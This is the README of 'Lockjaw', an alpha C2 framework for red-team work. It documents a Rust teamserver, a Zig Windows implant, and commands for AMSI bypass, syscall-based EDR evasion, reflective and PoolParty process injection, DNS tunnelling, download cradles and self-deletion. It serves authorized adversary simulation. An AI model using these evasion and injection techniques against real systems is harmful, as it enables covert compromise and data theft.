Lockjaw is an advanced, modular command-and-control (C2) framework engineered for red team engagements, adversarial simulations, and stealth operations. It utilizes a modern split-language architecture: a high-concurrency Rust Teamserver coupled with an evasive, dependency-free Zig implant and pure-assembly position-independent code (PIC) stagers.
THIS IS ALPHA SOFTWARE Use at your own risk. Not all features have been tested, the code has not been reviewed. There are bugs and certain commands may not work.
The following have been tested:
- Teamserver and client communications
- EXE implant
- Agent commands for recon
- Process injection
BOF support has not been tested.
+------------------------------------+
| Operator CLI (Python) |
| Async TUI / Prompt-Toolkit |
+-----------------+------------------+
| HTTPS / REST API (Port 50051)
v
+------------------------------------+
| Lockjaw Teamserver |
| (Rust / Tokio) |
| - SQLite Storage (SQLx) |
| - Dynamic Zig Cross-Compiler |
| - Multi-Transport Listener Manager|
+--------+------------------+--------+
| |
HTTPS / HTTP DNS (UDP 53)
(WinHTTP) (Hickory DNS / Base32)
| |
v v
+------------------------------------+
| Lockjaw Implant (Zig) |
| - Indirect Syscalls (Halo's Gate) |
| - Reflective & PoolParty Injection|
| - In-Memory BOF Execution Engine |
| - Ghost AMSI Bypass (HWBP + VEH) |
| - IAT-Clean Dynamic API Resolv. |
| - RC4-Encrypted Communications |
+------------------------------------+
- Teamserver (Rust): Built on Tokio and Axum with Rustls. Manages agent checkins, task dispatching, listener lifecycles, and SQLite persistence. Integrates an on-demand payload cross-compilation pipeline leveraging Zig and GNU objcopy.
- Implant (Zig & Assembly): Cross-compiled natively targeting
x86_64-windows. Standalone, zero external C-runtime dependencies, running in the.Windowssubsystem (headless, no console window). - Stagers (PIC Assembly & PowerShell): Hardened x64 position-independent assembly stager (
pic_stager.s) with safe-stack architecture, shadow space preservation, and dynamic PEB traversal, alongside lightweight PowerShell download cradles. - Operator CLI (Python 3): Asynchronous TUI built on
prompt_toolkitfeaturing real-time checkin alerts, numeric indexing, prefix matching, context management, and automatic file upload/download synchronization.
- Indirect Syscalls (Hell's Gate + Halo's Gate):
- Dynamically extracts System Service Numbers (SSNs) directly from in-memory
ntdll.dllusing DJB2 hashing. - Recovers hooked syscalls via Halo's Gate neighbor scanning (up to 32 slots above and below).
- Jumps directly to legitimate
syscall; retgadgets residing within the.textsection ofntdll.dll, evading user-mode API hooks, call stack inspection, and return-address origin checks.
- Dynamically extracts System Service Numbers (SSNs) directly from in-memory
- "Ghost" AMSI Bypass (HWBP + VEH):
- In-memory AMSI neutralizer using Hardware Breakpoints (DR0/DR7) and Vectored Exception Handling (
AddVectoredExceptionHandler). - Triggers an internal exception (
0xDEADBEEF) to configure debug registers onAmsiScanBuffer. - Catches
EXCEPTION_SINGLE_STEP, zeroes RAX (AMSI_RESULT_CLEAN = 0), and cleanly returns execution to caller. - Modifies zero
.textmemory bytes and avoidsSetThreadContextdetection vectors.
- In-memory AMSI neutralizer using Hardware Breakpoints (DR0/DR7) and Vectored Exception Handling (
- 100% IAT-Clean & Dynamic API Resolution:
- Zero static imports for sensitive Win32/NT APIs.
- Resolves modules by walking the PEB (
InLoadOrderModuleList) and resolves function addresses dynamically via compile-time case-sensitive (djb2) and case-insensitive (djb2_i) hashing.
- Encrypted Communications:
- Symmetric RC4 stream encryption across all agent-teamserver communications (checkins, tasking, results).
- Unique agent identification derived from PID, TID, and machine name via linear congruential generator (LCG).
- Stealth Footprint:
- Operates as a
.Windowssubsystem GUI application. - Suppresses console windows via
ShowWindow(hWnd, SW_HIDE). - Configurable beacon sleep with randomized jitter algorithms.
- Automatic SSL certificate error bypass (
SECURITY_IGNORE_ALL_CERT_ERRORS) enabling operational use with self-signed TLS certificates and domain fronting.
- Operates as a
- Self-Destruct:
- Shuts down the agent process and spawns a detached, asynchronous cleanup command (
ping 127.0.0.1 -n 3 > nul & del /f /q ...) to securely wipe the binary from disk.
- Shuts down the agent process and spawns a detached, asynchronous cleanup command (
- Direct Reflective Manual Mapping (
migrate <pid> reflective):- Manually maps the agent's executable image into a remote target process using dual-mapped shared memory sections (
NtCreateSection+NtMapViewOfSectionmapped RW locally and RWX remotely). - Avoids suspicious remote virtual memory allocations (
NtAllocateVirtualMemory/NtWriteVirtualMemory). - Performs local PE header copying, section mapping, base relocation delta fixes, and import table resolution directly within shared memory before initiating remote thread execution via
NtCreateThreadExindirect syscalls. - Built-in architecture validation to protect against 32-bit (WOW64) injection mismatches.
- Manually maps the agent's executable image into a remote target process using dual-mapped shared memory sections (
- Reflective PoolParty Injection (
migrate <pid> reflective_poolstomp):- Combines reflective section mapping with advanced PoolParty process injection.
- Enumerates remote process handles via
NtQuerySystemInformationto discover existing thread pool worker factories (TpWorkerFactory). - Queries
WorkerFactoryBasicInformation, overwrites the factory'sStartRoutinewith an execution trampoline, and triggers agent execution by incrementingWorkerFactoryThreadMinimumviaNtSetInformationWorkerFactory. - Zero new thread creation: Completely evades telemetry and alerts anchored on
CreateRemoteThread/NtCreateThreadEx(e.g., Sysmon Event ID 8, ETW threat intelligence providers).
- Built-in COFF loader supporting
AMD64object files. - Full internal handling of relocations (
IMAGE_REL_AMD64_ADDR64,IMAGE_REL_AMD64_ADDR32,IMAGE_REL_AMD64_ADDR32NB,IMAGE_REL_AMD64_REL32). - Resolves external dynamic dependencies using the standard
__imp__<DLL>$<Function>convention. - Implements Beacon API compatibility functions:
- Argument parsing:
BeaconDataParse,BeaconDataInt,BeaconDataShort,BeaconDataLength,BeaconDataExtract. - Output formatting:
BeaconFormatAlloc,BeaconFormatReset,BeaconFormatFree,BeaconFormatAppend,BeaconFormatPrintf,BeaconFormatToString,BeaconFormatInt. - Execution output & diagnostics:
BeaconOutput,BeaconPrintf,BeaconIsAdmin.
- Argument parsing:
- HTTP / HTTPS:
- High-performance web listener powered by Axum and Rustls.
- WinHTTP-based client transport with proxy auto-detection, configurable timeouts, and custom
Hostheader domain-fronting support. - Automatic self-signed certificate generation at startup.
- Covert DNS Tunneling:
- Native DNS listener implementation supporting authoritative TXT queries.
- Client queries transmit Base32-encoded, RC4-encrypted checkin and result payloads via subdomains (
<base32>.<domain>). - Teamserver delivers tasking inside DNS TXT response records.
- Dynamic Multi-Listener Support:
- Start, stop, and inspect multiple HTTP, HTTPS, and DNS listeners dynamically at runtime without restarting the teamserver.
- Process Inspection (
ps):- Enumerates running processes with process IDs and image names.
- Detects process architecture (
x86vsx64viaIsWow64Process). - Evaluates Windows Exploit Guard mitigation policies: Arbitrary Code Guard (ACG) and Control Flow Guard (CFG).
- Resolves process token user and owner domain accounts via
OpenProcessTokenandLookupAccountSidA.
- Windows Service Auditing (
sc_enum,sc_query):- Enumerates all installed Windows services via the Service Control Manager (SCM), reporting status (
RUNNING,STOPPED,STARTING,STOPPING), PID, Service Name, and Display Name. - Deep-queries specific service configurations (
sc_query <name>), detailing binary paths, start types (BOOT_START,SYSTEM_START,AUTO_START,DEMAND_START,DISABLED), service accounts, and service types.
- Enumerates all installed Windows services via the Service Control Manager (SCM), reporting status (
- Host & Network Profiling:
whoami: Detailed identity checkin payload.ipconfig: Enumerates network adapters, descriptions, IP addresses, subnet masks, and default gateways viaGetAdaptersInfo.pid: Returns the current implant process ID.
- File Management:
- Full remote filesystem control:
pwd,cd,ls,cat,rm. - High-performance binary file transfer:
uploadanddownloadwith automated base64 transport and local file handling.
- Full remote filesystem control:
- Command Execution:
shell <cmd>: Executes commands viacmd.exe /cthrough anonymous pipes without window creation.
- Linux (Teamserver host)
- Rust & Cargo (2024 edition)
- Zig Compiler (v0.15.x, e.g. Zig 0.15.2) — required for implant compilation
- Python 3 with
requestsandprompt_toolkit— for the Operator CLI - Binutils / objcopy — required when generating raw
.binshellcode payloads
sudo apt update
sudo apt install -y curl build-essential binutils python3 python3-venv
# Install Rust & Cargo
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
source "$HOME/.cargo/env"
# Install Zig Compiler (v0.15.2)
wget https://ziglang.org/download/0.15.2/zig-linux-x86_64-0.15.2.tar.xz
tar xf zig-linux-x86_64-0.15.2.tar.xz
sudo mv zig-linux-x86_64-0.15.2 /opt/zig
sudo ln -s /opt/zig/zig /usr/local/bin/zig
# Setup Python CLI dependencies
python3 -m venv venv
source venv/bin/activate
pip install requests prompt_toolkitcd teamserver
cargo build --releaseThe compiled binary will be placed at teamserver/target/release/teamserver.
cd teamserver
./target/release/teamserver [OPTIONS]| Option | Default | Description |
|---|---|---|
--op-port <PORT> |
50051 |
Port for the Operator REST API |
--op-host <HOST> |
127.0.0.1 |
Host address for the Operator REST API |
--no-listeners |
false |
Disable starting the default HTTPS agent listener |
--http-port <PORT> |
8080 |
Port for the default agent HTTPS listener |
--http-host <HOST> |
127.0.0.1 |
Host address for the default agent HTTPS listener |
--db-path <PATH> |
lockjaw.db |
Path to the SQLite database |
--api-key <KEY> |
lockjaw_secret_key |
Static authentication key for the Operator API |
--op-cert <PATH> |
op_cert.pem |
SSL certificate path for Operator API (auto-generated if missing) |
--op-key <PATH> |
op_key.pem |
SSL key path for Operator API (auto-generated if missing) |
--agent-cert <PATH> |
agent_cert.pem |
SSL certificate path for Agent HTTPS listener (auto-generated if missing) |
--agent-key <PATH> |
agent_key.pem |
SSL key path for Agent HTTPS listener (auto-generated if missing) |
Launch the asynchronous TUI client:
python3 client/lockjaw_cli.py --host 127.0.0.1 --port 50051 --key lockjaw_secret_keyThe CLI operates across three distinct operational contexts:
| Command | Description |
|---|---|
agents |
List all registered agents with numeric index, ID, hostname, username, IPs, status, and last seen |
interact <index|prefix|id> |
Switch to agent context using numeric index (e.g. interact 1) or ID prefix |
remove <index|prefix|id> |
Delete an agent record from the database |
listeners |
Switch to listener management context |
generate <host> <port> [domain] [flags] |
Dynamically compile a payload via the teamserver |
powershell <host> <port> |
Print a PowerShell download-and-execute one-liner cradle |
exit |
Exit the CLI |
| Category | Command | Description |
|---|---|---|
| Foundational | sleep <sec> [jitter] |
Update agent beacon sleep interval and jitter percentage |
pwd |
Print current remote working directory | |
cd <dir> |
Change remote directory | |
back |
Return to global context | |
die |
Terminate the remote agent process | |
| Execution | shell <cmd> |
Execute a system command via cmd.exe /c |
bof <path> [b64_args] |
Execute a Beacon Object File (.obj) in-memory |
|
| Evasion & Migration | amsi |
Enable "Ghost" Hardware Breakpoint AMSI bypass |
migrate <pid> [method] |
Migrate to target PID via reflective (direct PE map) or reflective_poolstomp (PoolParty worker factory) |
|
self_destruct |
Terminate agent and delete executable binary from disk | |
| Situational Awareness | ps |
List processes with PID, Arch (x86/x64), ACG, CFG, User, and Name |
sc_enum |
Enumerate all installed Windows services with status and PID | |
sc_query <name> |
Query detailed configuration of a specific Windows service | |
whoami |
Retrieve current agent context and identity | |
ipconfig |
Display network interfaces, IPs, subnets, and gateways | |
pid |
Print the agent process ID | |
| File Management | ls [dir] |
List files in target directory |
cat <file> |
Display file contents | |
rm <file> |
Delete remote file | |
upload <local> <remote> |
Upload a local file to the remote target | |
download <remote> [local] |
Download a remote file to local disk | |
| Task Management | tasks |
List recent tasks and statuses for this agent |
result <task_id> |
View output for a specific task |
| Command | Description |
|---|---|
list |
Display all active listeners and supported protocols (HTTP, HTTPS, DNS) |
start <type> <port> [domain] |
Start a new listener (e.g. start https 8443 or start dns 53 c2.example.com) |
stop <listener_id> |
Stop an active listener (e.g. stop https-8443) |
back |
Return to global context |
Payloads can be compiled dynamically on-demand through the CLI/Teamserver or built manually from source using the Zig compiler.
generate <host> <port> [domain] [--format <exe|dll|powershell|shellcode>] [--protocol <http|https|dns>] [--sleep <sec>] [--staged] [--name <filename>]
Supported formats:
exe(default): Standalone Windows executable (.Windowssubsystem).dll: Dynamic Link Library.powershell: PowerShell download-and-execute stager script (.ps1).shellcode: Raw position-independent binary (.bin) built frompic_stager.s.
Examples:
# Generate standard stageless HTTPS executable
generate 192.168.1.100 8080 --protocol https --format exe
# Generate a staged DNS implant with 10s sleep
generate 192.168.1.100 53 c2.example.com --protocol dns --sleep 10 --staged
# Generate position-independent shellcode
generate 192.168.1.100 8080 --format shellcode --name payload
To compile implants directly on the command line:
cd implant
# Build standard release executable
zig build --release=small \
-Dc2_host="192.168.1.100" \
-Dc2_port=8080 \
-Dc2_transport="https" \
-Dc2_sleep=5 \
-Dc2_jitter=20
# Build DLL implant
zig build --release=small \
-Dc2_host="192.168.1.100" \
-Dc2_port=8080 \
-Dis_dll=true
# Build raw PIC shellcode stager
zig build --release=small \
-Dc2_host="192.168.1.100" \
-Dc2_port=8080 \
-Dis_shellcode=trueBuild outputs are generated in implant/zig-out/bin/.
All operator endpoints require the Authorization header set to the configured --api-key.
| Method | Endpoint | Description |
|---|---|---|
GET |
/connect |
Test connection and authenticate API key |
GET |
/agents |
List all registered agents and metadata |
POST |
/agents/{id} |
Delete an agent record |
GET |
/listeners |
List active listeners |
GET |
/listeners/protocols |
List supported listener protocols |
POST |
/listeners |
Start a new listener (port, protocol, domain, key) |
POST |
/listeners/{id} |
Stop a listener by ID |
POST |
/payload |
Cross-compile a payload on demand |
GET |
/stage |
Serve compiled payload binary for stagers |
POST |
/tasks |
Queue a task for an agent |
GET |
/tasks/{agent_id} |
Retrieve tasks for an agent |
GET |
/results/{task_id} |
Fetch results for a specific task |
Lockjaw is developed exclusively for authorized red teaming, adversary simulation, penetration testing, and security research. Usage of Lockjaw against target infrastructure without prior mutual, written consent is strictly illegal. The developers assume no liability for misuse of this software.